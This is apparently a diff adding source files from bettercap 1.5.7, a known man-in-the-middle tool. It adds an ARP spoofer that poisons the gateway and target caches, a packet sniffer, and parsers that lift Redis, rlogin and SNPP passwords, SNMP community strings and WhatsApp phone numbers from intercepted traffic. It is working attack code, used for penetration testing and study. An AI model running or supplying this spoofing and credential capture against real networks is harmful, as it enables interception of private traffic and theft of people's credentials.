xettercap 1.5.7xerob

data/lib/bettercap/sniffer/parsers/redis.rb

@@ -0,0 +1,39 @@
+=begin
+
+BETTERCAP
+
+Author : Simone 'evilsocket' Margaritelli
+Email  : evilsocket@gmail.com
+Blog   : http://www.evilsocket.net/
+
+This project is released under the GPL 3 license.
+
+=end
+
+module BetterCap
+module Parsers
+# Redis authentication parser.
+class Redis < Base
+  def initialize
+    @name = 'REDIS'
+  end
+  def on_packet( pkt )
+    begin
+      if pkt.tcp_dst == 6379
+        lines = pkt.to_s.split(/\r?\n/)
+        lines.each do |line|
+          if line =~ /config\s+set\s+requirepass\s+(.+)$/i
+            pass = "#{$1}"
+            StreamLogger.log_raw( pkt, @name, "password=#{pass}" )
+          elsif line =~ /AUTH\s+(.+)$/i
+            pass = "#{$1}"
+            StreamLogger.log_raw( pkt, @name, "password=#{pass}" )
+          end
+        end
+      end
+    rescue
+    end
+  end
+end
+end
+end

data/lib/bettercap/sniffer/parsers/rlogin.rb

@@ -0,0 +1,45 @@
+=begin
+
+BETTERCAP
+
+Author : Simone 'evilsocket' Margaritelli
+Email  : evilsocket@gmail.com
+Blog   : http://www.evilsocket.net/
+
+This project is released under the GPL 3 license.
+
+=end
+
+module BetterCap
+module Parsers
+# BSD rlogin authentication parser.
+class Rlogin < Base
+  def initialize
+    @name = 'RLOGIN'
+  end
+  def on_packet( pkt )
+    begin
+      if pkt.tcp_dst == 513
+        # rlogin packet data = 0x00[client-username]0x00<server-username>0x00<terminal/speed>0x00
+
+        # if client username, server username and terminal/speed were supplied...
+        # regex starts at client username as the first null byte is stripped from pkt.payload.to_s
+        if pkt.payload.to_s =~ /\A([a-z0-9_-]+)\x00([a-z0-9_-]+)\x00([a-z0-9_-]+\/[0-9]+)\x00\Z/i
+          client_user = $1
+          server_user = $2
+          terminal = $3
+          StreamLogger.log_raw( pkt, @name, "client-username=#{client_user} server-username=#{server_user} terminal=#{terminal}" )
+        # else, if only server username and terminal/speed were supplied...
+        # regex starts at 0x00 as the first null byte is stripped from pkt.payload.to_s and the client username is empty
+        elsif pkt.payload.to_s =~ /\A\x00([a-z0-9_-]+)\x00([a-z0-9_-]+\/[0-9]+)\x00\Z/i
+          server_user = $1
+          terminal = $2
+          StreamLogger.log_raw( pkt, @name, "server-username=#{server_user} terminal=#{terminal}" )
+        end
+      end
+    rescue
+    end
+  end
+end
+end
+end

data/lib/bettercap/sniffer/parsers/snmp.rb

@@ -0,0 +1,44 @@
+=begin
+
+BETTERCAP
+
+Author : Simone 'evilsocket' Margaritelli
+Email  : evilsocket@gmail.com
+Blog   : http://www.evilsocket.net/
+
+SNMP community string parser:
+  Author : Matteo Cantoni
+  Email  : matteo.cantoni@nothink.org
+
+This project is released under the GPL 3 license.
+
+Todo: SNMPv2
+
+=end
+
+module BetterCap
+module Parsers
+# SNMP community string parser.
+class SNMP < Base
+  def on_packet( pkt )
+    begin
+      if pkt.udp_dst == 161
+
+        packet = Network::Protos::SNMP::Packet.parse( pkt.payload )
+        unless packet.nil?
+        	if packet.snmp_version_number.to_i == 0
+        	  snmp_version = 'v1'
+        	else
+        	  snmp_version = 'n/a'
+        	end
+
+          msg = "[#{'Version:'.green} #{snmp_version}] [#{'Community:'.green} #{packet.snmp_community_string.map { |x| x.chr }.join.yellow}]"
+
+          StreamLogger.log_raw( pkt, 'SNMP', msg )
+        end
+      end
+    rescue; end
+  end
+end
+end
+end

data/lib/bettercap/sniffer/parsers/snpp.rb

@@ -0,0 +1,37 @@
+=begin
+
+BETTERCAP
+
+Author : Simone 'evilsocket' Margaritelli
+Email  : evilsocket@gmail.com
+Blog   : http://www.evilsocket.net/
+
+This project is released under the GPL 3 license.
+
+=end
+
+module BetterCap
+module Parsers
+# Simple Network Paging Protocol (SNPP) authentication parser.
+class Snpp < Base
+  def initialize
+    @name = 'SNPP'
+  end
+  def on_packet( pkt )
+    begin
+      if pkt.tcp_dst == 444
+        lines = pkt.to_s.split(/\r?\n/)
+        lines.each do |line|
+          if line =~ /LOGIn\s+(.+)\s+(.+)$/
+            user = $1
+            pass = $2
+            StreamLogger.log_raw( pkt, @name, "username=#{user} password=#{pass}" )
+          end
+        end
+      end
+    rescue
+    end
+  end
+end
+end
+end

data/lib/bettercap/sniffer/parsers/teamviewer.rb

@@ -0,0 +1,30 @@
+# encoding: UTF-8
+=begin
+
+BETTERCAP
+
+Author : Simone 'evilsocket' Margaritelli
+Email  : evilsocket@gmail.com
+Blog   : http://www.evilsocket.net/
+
+This project is released under the GPL 3 license.
+
+=end
+
+module BetterCap
+module Parsers
+# MySQL authentication parser.
+class TeamViewer < Base
+  def on_packet( pkt )
+    begin
+      if pkt.tcp_dst == 5938 or pkt.tcp_src == 5938
+        packet = Network::Protos::TeamViewer::Packet.parse( pkt.payload )
+        unless packet.nil?
+          StreamLogger.log_raw( pkt, 'TEAMVIEWER', "#{'version'.blue}=#{packet.version.yellow} #{'command'.blue}=#{packet.command.yellow}"  )
+        end
+      end
+    rescue; end
+  end
+end
+end
+end

data/lib/bettercap/sniffer/parsers/url.rb

@@ -0,0 +1,30 @@
+# encoding: UTF-8
+=begin
+
+BETTERCAP
+
+Author : Simone 'evilsocket' Margaritelli
+Email  : evilsocket@gmail.com
+Blog   : http://www.evilsocket.net/
+
+This project is released under the GPL 3 license.
+
+=end
+
+module BetterCap
+module Parsers
+# HTTP GET requests parser.
+#class Url < Base
+#  def on_packet( pkt )
+#    s = pkt.to_s
+#    if s =~ /GET\s+([^\s]+)\s+HTTP.+Host:\s+([^\s]+).+/m
+#      host = $2
+#      url = $1
+#      unless url =~ /.+\.(png|jpg|jpeg|bmp|gif|img|ttf|woff|css|js).*/i
+#        StreamLogger.log_raw( pkt, 'GET', "http://#{host}#{url}" )
+#      end
+#    end
+#  end
+#end
+end
+end

data/lib/bettercap/sniffer/parsers/whatsapp.rb

@@ -0,0 +1,33 @@
+# encoding: UTF-8
+=begin
+
+BETTERCAP
+
+Author : Simone 'evilsocket' Margaritelli
+Email  : evilsocket@gmail.com
+Blog   : http://www.evilsocket.net/
+
+WhatsApp OS Parser:
+  Author : Gianluca Costa
+  Email  : g.costa@xplico.org
+
+This project is released under the GPL 3 license.
+
+=end
+
+module BetterCap
+module Parsers
+# WhatsApp traffic parser.
+class Whatsapp < Base
+  def on_packet( pkt )
+    begin
+      if ( pkt.tcp_dst == 443 or pkt.tcp_dst == 5222 or pkt.tcp_dst == 5223 ) and pkt.payload =~ /^WA.*?([a-zA-Z\-\.0-9]+).*?([0-9]+)/
+        version = $1
+        phone = $2
+        StreamLogger.log_raw( pkt, 'WHATSAPP', "#{'phone'.green}=#{phone.yellow} #{'version'.green}=#{version.yellow}" )
+      end
+    rescue; end
+  end
+end
+end
+end

data/lib/bettercap/sniffer/sniffer.rb

@@ -0,0 +1,142 @@
+# encoding: UTF-8
+=begin
+
+BETTERCAP
+
+Author : Simone 'evilsocket' Margaritelli
+Email  : evilsocket@gmail.com
+Blog   : http://www.evilsocket.net/
+
+This project is released under the GPL 3 license.
+
+=end
+
+module BetterCap
+# Class responsible of loading BetterCap::Parsers instances and performing
+# network packet sniffing and dumping.
+class Sniffer
+  include PacketFu
+
+  @@ctx     = nil
+  @@parsers = nil
+  @@pcap    = nil
+  @@cap     = nil
+
+  # Start a new thread that will sniff packets from the network and pass
+  # each one of them to the BetterCap::Parsers instances loaded inside the
+  # +ctx+ BetterCap::Context instance.
+  def self.start( ctx )
+    Thread.new {
+      Logger.debug 'Starting sniffer ...'
+
+      setup( ctx )
+
+      start     = Time.now
+      skipped   = 0
+      processed = 0
+
+      self.stream.each do |raw_packet|
+        break unless @@ctx.running
+        begin
+          parsed = PacketFu::Packet.parse(raw_packet)
+        rescue Exception => e
+          parsed = nil
+        end
+
+        if skip_packet?(parsed)
+          skipped += 1
+        else
+          processed += 1
+          append_packet raw_packet
+          parse_packet parsed
+        end
+      end
+
+      stop = Time.now
+      delta = ( stop - start ) * 1000.0
+      total = skipped + processed
+
+      Logger.info "[#{'SNIFFER'.green}] #{total} packets processed in #{delta} ms ( #{skipped} skipped packets, #{processed} processed packets )"
+    }
+  end
+
+  private
+
+  # Return the current PCAP stream.
+  def self.stream
+    if @@ctx.options.sniff.src.nil?
+      return @@cap.stream
+    else
+      Logger.info "[#{'SNIFFER'.green}] Reading packets from #{@@ctx.options.sniff.src} ..."
+
+      begin
+        return PacketFu::PcapFile.file_to_array @@ctx.options.sniff.src
+      rescue Exception => e
+        Logger.error "Error while parsing #{@@ctx.options.sniff.src}: #{e.message}"
+        Logger.exception e
+      end
+    end
+    return []
+  end
+
+  # Return true if the +pkt+ packet instance must be skipped.
+  def self.skip_packet?( pkt )
+    begin
+      # not parsed
+      return true if pkt.nil?
+      # not IP packet
+      return true unless pkt.is_ip?
+      # skip if local packet and --local|-L was not specified.
+      unless @@ctx.options.sniff.local
+        return ( pkt.ip_saddr == @@ctx.iface.ip or pkt.ip_daddr == @@ctx.iface.ip )
+      end
+    rescue; end
+    false
+  end
+
+  # Apply each parser on the given +parsed+ packet.
+  def self.parse_packet( parsed )
+    @@parsers.each do |parser|
+      begin
+        parser.on_packet parsed
+      rescue Exception => e
+        Logger.exception e
+      end
+    end
+  end
+
+  # Append the packet +p+ to the current PCAP file.
+  def self.append_packet( p )
+    begin
+      @@pcap.array_to_file(
+          filename: @@ctx.options.sniff.output,
+          array: [p],
+          append: true ) unless @@pcap.nil?
+    rescue Exception => e
+      Logger.exception e
+    end
+  end
+
+  # Setup all needed objects for the sniffer using the +ctx+ Context instance.
+  def self.setup( ctx )
+    @@ctx = ctx
+
+    unless @@ctx.options.sniff.output.nil?
+      @@pcap = PacketFu::PcapFile.new
+      Logger.info "[#{'SNIFFER'.green}] Saving packets to #{@@ctx.options.sniff.output} ."
+    end
+
+    if @@ctx.options.sniff.custom_parser.nil?
+      @@parsers = Parsers::Base.load_by_names @@ctx.options.sniff.parsers
+    else
+      @@parsers = Parsers::Base.load_custom @@ctx.options.sniff.custom_parser
+    end
+
+    @@cap = Capture.new(
+        iface: @@ctx.options.core.iface,
+        filter: @@ctx.options.sniff.filter,
+        start: true
+    )
+  end
+end
+end

data/lib/bettercap/spoofers/arp.rb

@@ -0,0 +1,150 @@
+# encoding: UTF-8
+=begin
+
+BETTERCAP
+
+Author : Simone 'evilsocket' Margaritelli
+Email  : evilsocket@gmail.com
+Blog   : http://www.evilsocket.net/
+
+This project is released under the GPL 3 license.
+
+=end
+
+module BetterCap
+module Spoofers
+# This class is responsible of performing ARP spoofing on the network.
+class Arp < Base
+  # Initialize the BetterCap::Spoofers::Arp object.
+  def initialize
+    @ctx          = Context.get
+    @forwarding   = @ctx.firewall.forwarding_enabled?
+    @spoof_thread = nil
+    @sniff_thread = nil
+    @capture      = nil
+    @running      = false
+
+    update_gateway!
+  end
+
+  # Send a spoofed ARP reply to the target identified by the +daddr+ IP address
+  # and +dmac+ MAC address, spoofing the +saddr+ IP address and +smac+ MAC
+  # address as the source device.
+  def send_spoofed_packet( saddr, smac, daddr, dmac )
+    pkt = PacketFu::ARPPacket.new
+    pkt.eth_saddr = smac
+    pkt.eth_daddr = dmac
+    pkt.arp_saddr_mac = smac
+    pkt.arp_daddr_mac = dmac
+    pkt.arp_saddr_ip = saddr
+    pkt.arp_daddr_ip = daddr
+    pkt.arp_opcode = 2
+
+    @ctx.packets.push(pkt)
+  end
+
+  # Start the ARP spoofing.
+  def start
+    Logger.debug "Starting ARP spoofer ( #{@ctx.options.spoof.half_duplex ? 'Half' : 'Full'} Duplex ) ..."
+
+    stop() if @running
+    @running = true
+
+    if @ctx.options.spoof.kill
+      Logger.warn "Disabling packet forwarding."
+      @ctx.firewall.enable_forwarding(false) if @forwarding
+    else
+      @ctx.firewall.enable_forwarding(true) unless @forwarding
+    end
+
+    @sniff_thread = Thread.new { arp_watcher }
+    @spoof_thread = Thread.new { arp_spoofer }
+  end
+
+  # Stop the ARP spoofing, reset firewall state and restore targets ARP table.
+  def stop
+    raise 'ARP spoofer is not running' unless @running
+
+    Logger.debug 'Stopping ARP spoofer ...'
+
+    @running = false
+    begin
+      @spoof_thread.exit
+    rescue
+    end
+
+    Logger.debug "Restoring ARP table of #{@ctx.targets.size} targets ..."
+
+#    @ctx.targets.each do |target|
+#      if target.spoofable?
+#        5.times do
+#          spoof(target, true)
+#          sleep 0.3
+#        end
+#      end
+#    end
+
+    Logger.debug "Resetting packet forwarding to #{@forwarding} ..."
+
+    @ctx.firewall.enable_forwarding( @forwarding )
+  end
+
+  private
+
+  # Send an ARP spoofing packet to +target+, if +restore+ is true it will
+  # restore its ARP cache instead.
+  def spoof( target, restore = false )
+    if restore
+      send_spoofed_packet( @ctx.gateway.ip, @ctx.gateway.mac, target.ip, 'ff:ff:ff:ff:ff:ff' )
+      send_spoofed_packet( target.ip, target.mac, @ctx.gateway.ip, 'ff:ff:ff:ff:ff:ff' ) unless @ctx.options.spoof.half_duplex
+      @ctx.targets.each do |e|
+        if e.spoofable? and e.ip != target.ip and e.ip != @ctx.gateway.ip
+          send_spoofed_packet( e.ip, e.mac, target.ip, 'ff:ff:ff:ff:ff:ff' )
+        end
+      end
+    else
+      # tell the target we're the gateway
+      send_spoofed_packet( @ctx.gateway.ip, @ctx.iface.mac, target.ip, target.mac )
+      # tell the gateway we're the target
+      send_spoofed_packet( target.ip, @ctx.iface.mac, @ctx.gateway.ip, @ctx.gateway.mac ) unless @ctx.options.spoof.half_duplex
+      # tell the target we're everybody else in the network :D
+      @ctx.targets.each do |e|
+        if e.spoofable? and e.ip != target.ip and e.ip != @ctx.gateway.ip
+          send_spoofed_packet( e.ip, @ctx.iface.mac, target.ip, target.mac )
+        end
+      end
+    end
+  end
+
+  # Main spoofer loop.
+  def arp_spoofer
+    spoof_loop(1) { |target|
+      if target.spoofable?
+        spoof(target)
+      end
+    }
+  end
+
+  # Return true if the +pkt+ packet is an ARP 'who-has' query coming
+  # from some network endpoint.
+  def is_arp_query?(pkt)
+    # we're only interested in 'who-has' packets
+    pkt.arp_opcode == 1 and \
+    pkt.arp_dst_mac.to_s == '00:00:00:00:00:00' and \
+    pkt.arp_src_ip.to_s != @ctx.iface.ip
+  end
+
+  # Will watch for incoming ARP requests and spoof the source address.
+  def arp_watcher
+    Logger.debug 'ARP watcher started ...'
+
+    sniff_packets('arp') { |pkt|
+      if is_arp_query?(pkt)
+        Logger.info "[#{'ARP'.green}] #{pkt.arp_src_ip.to_s} is asking who #{pkt.arp_dst_ip.to_s} is."
+        send_spoofed_packet pkt.arp_dst_ip.to_s, @ctx.iface.mac, pkt.arp_src_ip.to_s, pkt.arp_src_mac.to_s
+      end
+    }
+  end
+end
+end
+end

data/lib/bettercap/spoofers/base.rb

@@ -0,0 +1,152 @@
+# encoding: UTF-8
+=begin
+
+BETTERCAP
+
+Author : Simone 'evilsocket' Margaritelli
+Email  : evilsocket@gmail.com
+Blog   : http://www.evilsocket.net/
+
+This project is released under the GPL 3 license.
+
+=end
+module BetterCap
+module Spoofers
+# Base class for BetterCap::Spoofers modules.
+class Base
+  # Hash of available spoofers ( spoofer name -> class name )
+  @@loaded = {}
+
+  class << self
+    # Called when this base class is inherited from one of the spoofers.
+    def inherited(subclass)
+      name = subclass.name.split('::')[2].upcase
+      @@loaded[name] = subclass.name
+    end
+
+    # Return a list of available spoofers names.
+    def available
+      @@loaded.keys
+    end
+
+    # Create an instance of a BetterCap::Spoofers object given its +name+.
+    # Will raise a BetterCap::Error if +name+ is not valid.
+    def get_by_name(name)
+      raise BetterCap::Error, "Invalid spoofer name '#{name}'!" unless available.include? name
+      BetterCap::Loader.load(@@loaded[name]).new
+    end
+  end
+
+  # Will raise NotImplementedError .
+  def initialize
+    not_implemented_method!
+  end
+  # Will raise NotImplementedError .
+  def start
+    not_implemented_method!
+  end
+  # Will raise NotImplementedError .
+  def stop
+    not_implemented_method!
+  end
+
+private
+
+  # Will create a PacketFu::Capture object using the specified +filter+ and
+  # will yield every parsed packet to the given code block.
+  def sniff_packets( filter )
+    begin
+      @capture = PacketFu::Capture.new(
+          iface: @ctx.options.core.iface,
+          filter: filter,
+          start: true
+      )
+    rescue  Exception => e
+      Logger.error e.message
+    end
+
+    @capture.stream.each do |p|
+      begin
+        unless @running
+          Logger.debug 'Stopping thread ...'
+          Thread.exit
+          break
+        end
+
+        pkt = PacketFu::Packet.parse p rescue nil
+
+        yield( pkt ) unless pkt.nil?
+
+      rescue Exception => e
+        Logger.error e.message
+      end
+    end
+  end
+
+  # Main spoof loop repeated each +delay+ seconds.
+  def spoof_loop( delay )
+    loop do
+      unless @running
+          Logger.debug 'Stopping spoofing thread ...'
+          Thread.exit
+          break
+      end
+
+      Logger.debug "Spoofing #{@ctx.targets.size} targets ..." unless @ctx.targets.empty?
+
+      update_targets!
+
+      @ctx.targets.each do |target|
+        yield(target)
+      end
+
+      sleep(delay)
+    end
+  end
+
+  # Get the MAC address of the gateway and update it.
+  def update_gateway!
+    unless @ctx.gateway.spoofable?
+      hw = Network.get_hw_address( @ctx, @ctx.gateway.ip )
+      raise BetterCap::Error, "Couldn't determine router MAC" if ( @ctx.options.need_gateway? and hw.nil? )
+      @ctx.gateway.mac = hw unless hw.nil?
+    end
+
+    ###Logger.info "[#{'GATEWAY'.green}] #{@ctx.gateway.to_s(false)}"
+  end
+
+  # Update each target that needs to be updated.
+  def update_targets!
+    @ctx.targets.each do |target|
+      # targets could change, update mac addresses if needed
+      if target.mac.nil?
+        hw = Network.get_hw_address( @ctx, target.ip )
+        if hw.nil?
+          Logger.warn "Couldn't determine target #{target.ip} MAC address!"
+          next
+        else
+          target.mac = hw
+          ###Logger.info "[#{'TARGET'.green}] #{target.to_s(false)}"
+        end
+      # target was specified by MAC address
+      elsif target.ip_refresh
+        ip = Network.get_ip_address( @ctx, target.mac )
+        if ip.nil?
+          Logger.warn "Couldn't determine target #{target.mac} IP address!"
+          next
+        else
+          doprint = ( target.ip.nil? or target.ip != ip )
+          target.ip = ip
+          ###Logger.info("[#{'TARGET'.green}] #{target.to_s(false)}") if doprint
+        end
+      end
+    end
+  end
+
+  # Used to raise a NotImplementedError exception.
+  def not_implemented_method!
+    raise NotImplementedError, 'Spoofers::Base: Unimplemented method!'
+  end
+end
+end
+end